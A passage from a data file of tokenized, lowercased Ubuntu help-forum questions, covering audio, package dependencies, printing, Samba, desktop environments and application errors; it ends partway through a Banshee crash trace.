63346	garbled festival sound	i 'm using the festival speech synthesizer under ubuntu 10.04 like : echo ' ( saytext `` hello world '' ) ' | esddsp festival -- pipe this works perfectly on 32-bit systems , but on 64-bit machines it 's unreliable . usually , it 'll work correctly the first time , and then subsequent calls with sound completely garbled , and i 'll get this error : error : ld.so : object '/usr/lib/esound/libesddsp.so.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object 'libesd.so.0 ' from ld_preload can not be preloaded : ignored . how would i fix this ? i 've googled , and it seems this is not a new error , but the problem seems to popup in different distros for different apps , and the solutions are usually convoluted and involve recompiling the entire audio stack .
63347	uninstalling knetworkmanager removes icon from system tray	i happened to install knetworkmanager over my default installation of kubuntu 11.04 . then i tried to open if from the k_menu-system- . i got a message asking me if want to use it always . i replied yes . after a reboot , the interface of the tray icon of network manager changed , though the functionality appears to be same . i did n't like the interface . so i uninstalled knetworkmanager . boom i had no network manager in the system tray . i uninstalled and reinstalled 'network-manager-pptp-kde ' but i could not get back the interface that i liked .
63348	how do i install xulrunner for mongodb ?	for installing mongodb i want to install these dependenciy so when i run this command sudo apt-get install curl tcsh scons g++ xulrunner-1.9-dev libpcre++-dev libboost-dev libmozjs-dev give me this result : building dependency tree reading state information ... done note , selecting 'libmozjs185-dev ' instead of 'libmozjs-dev' g++ is already the newest version . g++ set to manually installed . curl is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xulrunner-1.9-dev : depends : xulrunner-1.9 ( > = 1.9.0.19+nobinonly ) but it is not going to be installed e : broken packages i tried setting source list and update and install but it is not happening ? here is my source list . deb http : //archive.ubuntu.com/ubuntu/ natty main restricted universe deb-src http : //archive.ubuntu.com/ubuntu/ natty main restricted universe deb http : //archive.ubuntu.com/ubuntu/ natty-updates main restricted universe deb-src http : //archive.ubuntu.com/ubuntu/ natty-updates main restricted universe deb http : //security.ubuntu.com/ubuntu natty-security main restricted universe deb-src http : //security.ubuntu.com/ubuntu natty-security main restricted universe deb http : //download.webmin.com/download/repository sarge contrib deb http : //webmin.mirror.somersettechsolutions.co.uk/repository sarge contrib deb http : //security.ubuntu.com/ubuntu hardy-security main deb http : //security.ubuntu.com/ubuntu lucid-security main universe deb http : //ubuntu.mirror.cambrium.nl/ubuntu/ lucid-updates main universe deb http : //ubuntu.mirror.cambrium.nl/ubuntu/ natty main universe please suggest what can be problem , how can i install it ?
63351	file corruption issues from a samba server to windows and mac clients	i 'm running ubuntu 10.04 server as a file server . it is on the windows active directory domain ( 2008 sbs ) and has been working well for several years ( migrated to new hardware and upgraded from 8.04 a few months ago ) . clients were originally all windows xp , but now there 's more macs ( 12 snow leopard , 2 lion ) than windows ( 1 xp , 1 vista , 2 seven ) , which are all still using samba for sharing . today some users are having issues with various adobe products on snow leopard ( flash cs5 and photoshop at least ) crashing or missing parts when opening files directly from the network , but they are fine when copying the file to the desktop and opening from there . i have not had these issues personally . what is the best method to determine what is going on ?
63355	how do backslash escapes work with echo -e in zsh ?	i have a script where i need to preserve the \\ character sequences but the command echo -e \\ prints \ when it should be \\ . correct ? is this a bug in the version of ubuntu i am using ? i am using ubuntu 11.04 and i am using zsh version : % zsh -- version zsh 4.3.11 ( i686-pc-linux-gnu )
63356	desktop environments that allow drag'n'drop across applications via alt-tab	which desktop environments allow to drag'n'drop files/data across applications while task-switching using alt-tab ( without the need to move mouse cursor to a specific ui element and/or wait for other ui elements to become active ) ? to the best of my knowledge : working unity 2d of ubuntu 11.04 ( as using metacity ) does drag'n'drop across applications while switching tasks via alt-tab work in unity 2d ? xmonad on kubuntu 11.04 ( as of answer below , thanks ) not working : unity ( 3d ) of ubuntu 11.04 ( as using compiz ) drag and drop across ( fullscreen ) applications , switching via alt-tab unity 2d of ubuntu 11.10 unity ( 3d ) of ubuntu 11.10 gnome-shell of ubuntu 11.10
63358	making specific folder accessible to user for 24 hour only	is there possible to make some folder accessible to one user for 24 hours only with some password which is prescribed by me as the owner of material in folders . i am a teaching assistant and i would like to use those 5 gb as a knowledge library for students . so i would like to make permissions for using material in folders for only 24 hours per one student . i would like to work it like that : i give to student password and he can access folders in ubuntu just for 24 hours . after 24 hours he would have to get new password from me if he would like to use more material loaded in my ubuntu account . this is the basic of idea . is it possible ?
63360	how to access root acount ?	i 'd installed ubuntu 10.10 inside windows 7 . at the time of installation it did n't asked for any root account but when i 'm trying to install db2 it want access to root account . how can i go to root account in terminal of ubuntu 10.10 ?
63363	how to use two sound sources while using recordmydesktop ?	i 'm using recordmydesktop and here is my problem : i need to record the sound emitted by my desktop and put some comments on it at the same time . for now , i have no problem commenting what 's on screen , my microphone records my voice correctly , but there is any way i can record the sound made by the software as well ?
63368	automatic system updates , how to configure apt : :periodic : :autocleaninterval to clean obsoleted cache only ?	i 've been using auto update for a while , but recently i discovered the downloaded package cache missing in /var/cache/apt/archives , some deb packages , like skype , are removed , and i do n't know why . so i 'm thinking about this option : apt : :periodic : :autocleaninterval , currently set to 0 . this page did n't provide much information : https : //help.ubuntu.com/community/automaticsecurityupdates
63371	use docky within unity	i want to give unity a try but still need some docklets that are provided by docky , until unity gets more flexible . is there a way to prevent docky from managing windows without a launcher . otherwise i have both , unity and docky , managing my open windows , which is a waste of space . there has already been a question about unchecking the named option , what seems to be not possible by default : `` uncheck-manage-windows-without-launcher '' the answer was an explanation , why one of the docks in docky does have to manage windows . i am searching for a tweak , to change that behavior . since there is a tweak to hide the `` anchor-icon '' in docky `` remove anchor in docky '' , maybe it is possible to hide docky 's `` window-manager '' as well .
63373	php using different libxml2 version , than the one installed in /usr/lib/	i tried to install mediawiki , which told me to update my libxml2 to at least version 2.7.3 . so i 've checked that and found /usr/lib/libxml2.so.2.7.6 to be installed . xml2-config -- version also returns 2.7.6 . but when reading the outputs of phpinfo ( ) ; it tells me the libxml compiled version is 2.6.32 . how can i tell php to use the correct libxml2 , while avoiding recompiling anything by hand , as i like to use the ubuntu package-upgrades in the future . i 'm currently running ubuntu 10.04.3 ( lucid ) lts and having installed the php5 and libapache-mod-php5 packages from the main sources ( php 5.3.5-0.dotdeb.0 ) .
63379	procedure to follow after a distro upgrade	for non rolling release like ubuntu , i 'm always confused on what to do after an upgrade . in a very short time 11.10 will be released . so i 'm asking what to do after the upgrade . the objective is to preserve the system as it was , taking advantage of the new features and the new versions of apps , but preserve the stability of the system , as get the same documents , ppa 's , applications installed , and settings . in case of upgrade using the update manager , what i should do after , in order to preserve the ppa 's i had but updated for the new release ? and what things should i do in general ? in case of a fresh install , with separate home partition that will not be touched or changed , what should i do , in order to get the ppa 's as they were updated for the new version ? how do i preserve all the settings and apps ? and what general things i should do ? p.s . i 'm not interested in the upgrade itself , it 's the various actions to do after the upgrade on both occasions , fresh or not . it 's about time to explain this aspect for new and old users .
63380	restart an application if taking lot of memory	how can i restart an application if it 's taking a lot of say cpu utilization or taking too much ram on linux , is there any shell script to do the same ?
63382	ubuntu hangs while booting	yesterday i closed my pc properly . today while booting , ubuntu hangs after line : starting timidity++ alsa midi emulation [ ok ] i have these fail messages below , nothing else seems wrong : starting load fallback graphics devices [ fail ] stopping automatic crash report generation [ fail ] i have tried updating grub menu and cleaning old packages and linux headers but it did not work . i can boot my pc in safe graphics mode . that cause me to suspect my graphics settings . i am using lenovo sl500 and hp pavilion dv9087ea . moving my disk between these two did not work . it hangs at same boot stage in two computers . do you have any suggestion to inspect problem ? lenovo graphics card : 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 9300m gs ] ( rev a1 ) hp graphics card : nvidia geforce 7600 go
63384	open source command line tool for optimizing pdf	are there any open-source command line tool for optimizing pdf in ubuntu . i have used ghost script and i am able to convert the pdf into 72 dpi , gs -sdevice=pdfwrite -dcompatibilitylevel=1.4 -dpdfsettings=/screen -dnopause -dquiet -dbatch -soutputfile=screen.pdf 777.pdf but what i would like to do is mention what dpi i want to convert the pdf to , like a 300 dpi pdf file to 90 dpi pdf file .
63385	can not connect to onda gsm phone using network-manager	on oneiric unstable fully updated/upgraded using network-manager broadband connection with : id 19d2:1015 onda communication s.p.a . i want some hints to make a onda gsm usbkey 19d2:1015 work ? route show me destination gateway genmask flags metric ref use iface default * 0.0.0.0 u 0 0 0 usb0 link-local * 255.255.0.0 u 1000 0 0 usb0 it connects and the usb0 device get ip-address from the provider but i can not get webpages ( also typing a known ip in firefox ) it seem to be something about routing default gw , there is no active firewall on this pc btw , all works using sakis3g or wvdial or gnome-ppp
63406	are there any kernel optimization for multi-arch ?	i just discovered that synaptic on my oneiric installation displays about 55 thousand packages instead of 35 . about 20 of these have a name ending with : i386 . i also recently read in the oneiric beta release notes that the amd-64-version of has better handling of 32-bit code . i guess these two facts are related . seamless installation of 32-bit coden on 64-bit installation is explained here . are there any optimizations ( kernel specific i guess ) regarding its execution ?
63407	where are startup commands stored ?	when you go to `` startup applications '' , you see a list of commands that are executed at startup and you can add your own . i would like to know where this list is stored . is it in gconf somewhere ? there are two reasons i want to know this : add commands programmatically disable some commands ( in oneiric , the default ones are not shown anymore )
63410	11.04 will not run on aspire one	i 'm trying to install 11.04 but after a while it will start showing a stream of random characters on screen , then get stuck and finally open busybox . if i type exit there i come up with a `` panic occurred , switching back to text console '' error and from there the loading wo n't progress . what 's wrong ?
63414	hp4500 officejet not detected by simple scan , can not access modem config . page or connect to wireless	i upgraded to 10.04 from 8.04 in september . when i try to use simple scan it says `` no scanners detected '' . sane-find-scanner detects my printer/scanner . update : lsusb now detects my scanner after i installed hplip from the hp website . administrator @ snoopy : ~ $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 045e:00db microsoft corp. natural ergonomic keyboard 4000 v1.0 bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 03f0:4712 hewlett-packard bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub sudo sane-find-scanner : # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x03f0 [ hp ] , product=0x4712 [ officejet 4500 g510a-f ] ) at libusb:001:005 # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . -- - the info below was appended martin owens , it 's definitely not impossible as it 's still happening . from /var/log/syslog nov 1 13:21:14 snoopy kernel : [ 163980.380089 ] usb 1-3 : new high speed usb device using ehci_hcd and address 3 nov 1 13:21:14 snoopy kernel : [ 163980.514030 ] usb 1-3 : configuration # 1 chosen from 1 choice nov 1 13:21:16 snoopy udev-configure-printer : add /devices/pci0000:00/0000:00:1d.7/usb1/1-3/1-3:1.1 nov 1 13:21:16 snoopy udev-configure-printer : parent devpath is /devices/pci0000:00/0000:00:1d.7/usb1/1-3 nov 1 13:21:16 snoopy udev-configure-printer : device vendor/product is 03f0:4712 nov 1 13:21:16 snoopy udev-configure-printer : mfg : hp mdl : officejet 4500 g510a-f sern : cn049f20c905h2 serial : cn049f20c905h2 nov 1 13:21:16 snoopy kernel : [ 163982.225839 ] usblp0 : usb bidirectional printer dev 3 if 1 alt 0 proto 2 vid 0x03f0 pid 0x4712 nov 1 13:21:16 snoopy kernel : [ 163982.225904 ] usbcore : registered new interface driver usblp nov 1 13:21:16 snoopy udev-configure-printer : add /devices/pci0000:00/0000:00:1d.7/usb1/1-3/1-3:1.1/usb/lp0 nov 1 13:21:18 snoopy kernel : [ 163984.395465 ] usb 1-3 : usbfs : interface 1 claimed by usblp while 'usb ' sets config # 1 nov 1 13:21:19 snoopy hp [ 2987 ] : io/hpmud/pp.c 627 : unable to read device-id ret=-1 nov 1 13:21:20 snoopy udev-configure-printer : sern fields match nov 1 13:21:20 snoopy udev-configure-printer : uri match : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : sern fields match nov 1 13:21:20 snoopy udev-configure-printer : uri match : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : parent devpath is /devices/pci0000:00/0000:00:1d.7/usb1/1-3 nov 1 13:21:20 snoopy udev-configure-printer : uri of print queue : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f s erial cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : queue ipp : //localhost:631/printers/officejet_4500_g510a-f has matching device uri nov 1 13:21:20 snoopy udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/officejet_4500_g510a-f nov 1 13:21:20 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : queue ipp : //localhost:631/printers/officejet_4500_g510a-f has matching device uri nov 1 13:21:20 snoopy udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/officejet_4500_g510a-f nov 1 13:21:20 snoopy udev-configure-printer : uri of print queue : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f s erial cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:20 snoopy udev-configure-printer : queue ipp : //localhost:631/printers/officejet_4500_g510a-f_2 has matching device uri nov 1 13:21:20 snoopy udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/officejet_4500_g510a-f_2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : queue ipp : //localhost:631/printers/officejet_4500_g510a-f_2 has matching device uri nov 1 13:21:21 snoopy udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/officejet_4500_g510a-f_2 nov 1 13:21:21 snoopy udev-configure-printer : uri of print queue : hpfax : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : hpfax usb officejet 4 500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of print queue : hpfax : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : hpfax usb officejet 4 500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of print queue : hpfax : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : hpfax usb officejet 4 500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of print queue : cups-pdf : / , normalized : cups pdf nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : usb : //hp/officejet % 204500 % 20g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510a f serial cn049f20c905h2 nov 1 13:21:21 snoopy udev-configure-printer : uri of detected printer : hp : /usb/officejet_4500_g510a-f ? serial=cn049f20c905h2 , normalized : officejet 4500 g510 a f serial cn049f20c905h2 do n't see anything in dmesg log . from dmesg | grep usb [ 0.124495 ] usbcore : registered new interface driver usbfs [ 0.124519 ] usbcore : registered new interface driver hub [ 0.124574 ] usbcore : registered new device driver usb [ 0.312547 ] usb usb1 : configuration # 1 chosen from 1 choice [ 0.313151 ] usb usb2 : configuration # 1 chosen from 1 choice [ 0.313627 ] usb usb3 : configuration # 1 chosen from 1 choice [ 0.314062 ] usb usb4 : configuration # 1 chosen from 1 choice [ 0.314486 ] usb usb5 : configuration # 1 chosen from 1 choice [ 0.900795 ] usb 3-2 : new low speed usb device using uhci_hcd and address 2 [ 1.122525 ] usb 3-2 : configuration # 1 chosen from 1 choice [ 1.429716 ] usbcore : registered new interface driver hiddev [ 1.431864 ] usbcore : registered new interface driver usbhid [ 1.433611 ] usbhid : v2.6 : usb hid core driver [ 1.560705 ] input : microsoft natural速 ergonomic keyboard 4000 as /devices/pci0000:00/0000:00:1d.1/usb3/3-2/3-2:1.0/input/input3 [ 1.560882 ] microsoft 0003:045e:00db.0001 : input , hidraw0 : usb hid v1.11 keyboard [ microsoft natural速 ergonomic keyboard 4000 ] on usb-0000:00:1d.1-2/input0 [ 1.584491 ] input : microsoft natural速 ergonomic keyboard 4000 as /devices/pci0000:00/0000:00:1d.1/usb3/3-2/3-2:1.1/input/input4 [ 1.584673 ] microsoft 0003:045e:00db.0002 : input , hidraw1 : usb hid v1.11 device [ microsoft natural速 ergonomic keyboard 4000 ] on usb-0000:00:1d.1-2/input1 [ 163980.380089 ] usb 1-3 : new high speed usb device using ehci_hcd and address 3 [ 163980.514030 ] usb 1-3 : configuration # 1 chosen from 1 choice [ 163982.225839 ] usblp0 : usb bidirectional printer dev 3 if 1 alt 0 proto 2 vid 0x03f0 pid 0x4712 [ 163982.225904 ] usbcore : registered new interface driver usblp [ 163984.395465 ] usb 1-3 : usbfs : interface 1 claimed by usblp while 'usb ' sets config # 1 also i am unable to access my modem configuration at http : //192.168.1.254/ as i am continuously prompted for my user name and password . i was able to access the page before the upgrade . my isp confirmed i have the correct info . i was also unable to connect to a wireless internet connection i.e . was continuously prompted for password . so could there be a problem with the software used to communicate with devices ? i know dbus was part of the upgrade & i think i installed a new version from the source ( and some other packages ) when i did n't have an internet connection and was trying to complete the upgrade . i also followed tips to fix a common problem with the password ring . should i re-install the dbus package or some other packages ? aquaherd , my processor : model name : intel ( r ) celeron ( r ) cpu 2.40ghz stepping : 4 cpu mhz : 2394.331 cache size : 256 kb i think my computer is several years old . i 'm not aware that there 's any difference in the usb ports , i am able to use them with my camera and my usb drive . maybe it changes to 2.0 once a device is plugged in .
63415	how to connect to internet via mobile broadband ?	i am trying to connect to internet in ubuntu-11.04 with nokia-x2.01 and bsnl ( name of the operator ) sim card in india . can someone help me on how to connect to mobile broadband ? i did connect to the mobile broadband but it is disconnecting automatically .
63419	unable to print on a networked canon printer using 64bit os	i have a canon mp970 connected to a machine running vista . i can address the printer in ubuntu but selecting print does not produce a print . checking the print que shows my job as 'processing ' . i´m thinking it may be a firewall or permissions issue but not sure what settings to look out for . my machine is running ubuntu 11.04 64bit and the other with printer attached is windows vista 32bit with file and printer sharing turned on and norton 360 . i´ve tried disabling the firewall with no effect . while browsing other posts i saw one that made mention of using samba to link linux and windows for file and printer sharing . software center shows a smb/cifs client installed but i´m not sure how to configure it . tried another samba client with a gui but it didn´t seem to make a difference ( it did find the printer share and list it in it´s gui ) . i opened a print window in the pdf viewer which showed the printer status as unavailable . i contacted canon asking them directly if they have an alternate driver for the printer for linux . they said no , and the age of the printer puts it out of support of that kind . i found another printer that had a linux driver for it ( mp880 ) and attempted to install it to see what happened . the install failed ( incorrect architecture ) . i believe it is due to the driver being 32bit and my os being 64bit . i read a post about recompiling a 32bit driver into a 64bit one ( however unstable ) but i do not have that much experience to follow that path yet . seems that despite the amount of time we have had 64bit processors and 64bit os´ there is a complete lack of support for 64bit functions . i fear the day we migrate to 128bit !
63420	how to fix virtualbox 's copy and paste to host-machine ?	sometimes while using virtualbox , i have tried copying text from the virtual machine to the host machine but failed . whenever that happens , i fix it by rebooting the virtual machine . is there a solution to this because i do n't want to keep rebooting again and again . note : iit is always possible for me to copy text from the host to the virtual machine .
63424	how to change tab width in terminal in ubuntu 10.04	when i press tab in terminal it goes very far . so i would like to change tab width , make it smaller . anyone could help me , please ?
63426	package created with quickly is of bad quality	i followed the tutorial and everything works except for the fact that apparently some information in the package is missing . do you know how i can fix this using quickly or manually ?
63431	installing gnome shell as separate session	i would like to install gnome-shell as a separate session because i do n't want to mess with my current desktop settings , etc . ( i have did huge customisations ) . how to do that ? any tutorial available ? btw , i use linux mint katya as my main desktop .
63434	what are the conceptual and technical differences between `` apps '' and packages ?	i 'm a bit confused by the recent announcement ( http : //developer.ubuntu.com/2011/09/announcing-the-ubuntu-app-developer-site/ ) of the new `` app '' developer site . i 've fallen out of ubuntu development and now only follow news stories to gauge the direction of the os , and had n't realized this was coming down the pipe . perhaps someone from the community could clear this up for me . i 'm very familiar with ubuntu , linux , programming , and packaging , but i 'm not sure what the conceptual and technical differences are between an ubuntu app and a debian package . i 've looked a bit into the developer community documentation , but have n't found a straight answer . can an ubuntu app be considered a specially configured package that supports ubuntu 's app framework ? and how flexible is that ? could i , for example , write an application in qt and still wrap it in an app ? ( as an aside , i 'm a little concerned ubuntu is headed in this direction . i understand that ubuntu should explore supporting multiple avenues of application development and distribution to stay relevant . but for a engineering user such as myself , this feels like cruft . these remarks are ignorant though . i should n't form a solid opinion until i know what 's going on . )
63442	how can i install glade 3.08 ?	oneric comes with glade 3.10 by default , and i need to install the older version . is there any ppa , or some nice way to install it short of download the natty deb , pray that it works and pin it in synaptic ? . some background : glade 3.10 has dropped support of gtk2.guis developed with glade 3.10 do n't work on older linux distros and they ca n't be used with pygtk . i 'm need my gtk programs to support 10.04 .
63443	command is giving me `` bash : ./fwupd : can not execute binary file ''	whenever i issue the command ./fwupd /dev/sda i get the following : bash : ./fwupd : can not execute binary file i 'm trying to update my ssd 's firmware using ubuntu 11.04 livecd . how do i successfully issue the command ?
63444	how do i make openbox look like the default ubuntu theme ?	i was trying out openbox , the superlightweight window manager , and something that struck me was `` wow , this is downright ugly '' . so , how do i install a ambiance theme to make it `` fit in '' more ?
63447	looking for an application that saves clipboard history	i am looking for an application that saves all ctrl c history . is there such a thing for ubuntu , or linux in general ? i remember seeing on of these , but i do n't quite remember the details .
63450	how to manage the dynamic ip in squid ?	my ip address is dynamic ip and i was using squid while i 'm reading there is things that must be forwarding to the some port to make everything locked and can be keep checking in the same way . any solution about this ? can anyone give me to know which is the best to use for cache manager , so i can have fast loading browser , and how to do the right configuration about it . cause i try to find the best but there is lot of different tutorial and there is also lot of problem . now i 'm using the 10.04 just for webmin cause im using webmin to make squid but i would like to learn using squid and upgrading my ubuntu to the latest version . do squid can work without webmin ?
63452	unity dash does not get keyboard focus first time	when i login to a unity session , the first time i press the super key , the dash pops up but the keyboard focus does not go to it . i press the super key a second time to dismiss the dash , and a third time to bring it back , and now it has the keyboard focus and i can type away happily . every time after that the dash gets the keyboard focus as i expect it to . anyone got any idea why ? or how to fix it ? i am using natty/11.04 and i upgraded to natty during the beta period which might have made the difference . ( i am still using natty ) this behaviour has been the same since i upgraded and started using unity . edit : as suggested by the first answer , i have now filed a bug about this .
63456	`` waiting for network configuration '' adding 3 to 5 minutes to boot time	i get the following pieces of information at the startup , takes about 3 to 5 minutes , while normally about 1 minute : waiting network configuration booting system without full network configuration i found after googling that i should change /etc/networks/interface . i commented out everything there but the problem remains : # auto lo # iface lo inet loopback # auto eth0 # iface eth0 inet dhcp # address 192.168.0.2 # netmask 255.255.255.0 # gateway 192.168.0.1 # broadcast 192.168.0.255 how can you make the startup of ubuntu 11.10 faster ?
63458	is cairo dock 2.4 fully compatible with intel i965 ?	well the title sums up my question . will it work on my card ? if it helps unity 3d works perfectly .
63462	for purchase software in software center is empty	for purchase software in software center is empty . all other software are fine . using ubuntu 11.10 us no proxy
63464	note taking software that can support advanced math notation	i 'm trying to keep a large collection of gcse notes for every subject i study , being 10 subjects . i will be using fairly advanced math notation so i would like it to support some system like latex or mathml . i want to be able to export notes to pdf for later revision and wiki style cross-links would be nice but not absolutely necessary . i have already considered wikimedia and latex . i believe latex is too document based and linking and expanding ideas would be hard . wikimedia , i feel might be a bit 'much ' as some pages could simply be a sentence or two long and i want to spend time learning subjects not how to structure a wiki page . so that all said , which note taking methods would you suggest ?
63468	quickly error in `` hello-world '' app - error : release command failed	i get an error in quickly with the hello world application . the error says error : release command failedcan anyone help me with this ? thanks in advance . bueno @ bueno-desktop : ~/projetos/quickly/hello-world/hello-world $ quickly release obter definições do launchpad launchpad connection is ok ... ... ... ... ... ubuntu packaging created in debian/ ... ... pushing to launchpad ... ... ... ... ... ... . você precisa de uma frase secreta para destravar a chave secreta do usuário : `` felipe bueno ( ... ) < bueno.felipe @ gmail.com > '' 2048-bit rsa chave , id 3923c214 , criada 2011-09-27 ... ... você precisa de uma frase secreta para destravar a chave secreta do usuário : `` felipe bueno ( ... ) < bueno.felipe @ gmail.com > '' 2048-bit rsa chave , id 3923c214 , criada 2011-09-27 ... ... ... ..checking signature on .changes gpg : assinatura feita qua 28 set 2011 18:12:43 brt usando rsa chave id 3923c214 gpg : assinatura correta de `` felipe bueno ( ... ) < bueno.felipe @ gmail.com > '' good signature on ../hello-world_11.09.5_source.changes . checking signature on .dsc gpg : assinatura feita qua 28 set 2011 18:12:39 brt usando rsa chave id 3923c214 gpg : assinatura correta de `` felipe bueno ( ... ) < bueno.felipe @ gmail.com > '' good signature on ../hello-world_11.09.5.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading hello-world_11.09.5.dsc : done . uploading hello-world_11.09.5.tar.gz : done . uploading hello-world_11.09.5_source.changes : done . successfully uploaded packages . traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/release.py '' , line 287 , in < module > release_version ) , changelog ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 57 , in push_tarball_to_launchpad release = create_release ( project , version ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 44 , in create_release date_targeted=release_date ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/resource.py '' , line 558 , in __call__ url , in_representation , http_method , extra_headers=extra_headers ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 281 , in _request raise error lazr.restfulclient.errors.unauthorized : http error 401 : unauthorized response headers : -- - content-length : 69 content-type : text/plain date : wed , 28 sep 2011 21:12:53 gmt server : zope.server.http ( http ) status : 401 vary : accept , accept-encoding via : 1.1 api.launchpad.net x-lazr-notifications : [ ] x-powered-by : zope ( www.zope.org ) , python ( www.python.org ) -- - response body : -- - ( < productseries at 0x2b7c6dc88750 > , 'newmilestone ' , 'launchpad.edit ' ) -- - erro : o comando release falhou abortando
63469	mupen64 is installed , but does n't show up in the dash	my mupen64 installation is nowhere to be found in unity and unity2d as well ... it works if i open it from terminal , but the gui is gone ! any help ?
63471	how to install ubuntu unity interface , from xubuntu installation ?	i wanted to try out unity interface , but currently xubuntu is installed , which package should i install ? i tried to install `` unity '' package directly , but the unity panel on left wo n't show up
63473	what is wrong with my banshee installation and how can i fix it ?	when i try to launch banshee this what i get : [ info 20:28:13.619 ] running banshee 2.2.0 : [ ubuntu oneiric ( development branch ) ( linux-gnu , x86_64 ) @ 2011-09-23 04:47:58 utc ] gtk-message : failed to load module `` rgba '' exception in gtk # callback delegate note : applications can use glib.exceptionmanager.unhandledexception to handle the exception . system.argumentexception : value does not fall within the expected range . at hyena.gui.canvas.rect.set_height ( double value ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.canvas.rect.op_explicit ( rectangle rect ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.gui.listview`1 [ banshee.collection.albuminfo ] .onsizeallocated ( rectangle allocation ) [ 0x00000 ] in < filename unknown > :0 at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) [ 0x00000 ] in < filename unknown > :0 at glib.exceptionmanager.raiseunhandledexception ( system.exception e , boolean is_terminal ) at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) at gtk.widget.gtksharp_widget_base_show ( intptr ) at gtk.widget.onshown ( ) at nereid.playerinterface.onshown ( ) at gtk.widget.shown_cb ( intptr widget ) at gtk.widget.gtk_widget_show ( intptr ) at gtk.widget.show ( ) at banshee.gui.baseclientwindow.initialshowpresent ( ) at nereid.playerinterface.initialize ( ) at banshee.gui.baseclientwindow.initializewindow ( ) at banshee.gui.baseclientwindow..ctor ( system.string title , system.string confignamespace , int32 defaultwidth , int32 defaultheight ) at nereid.playerinterface..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at 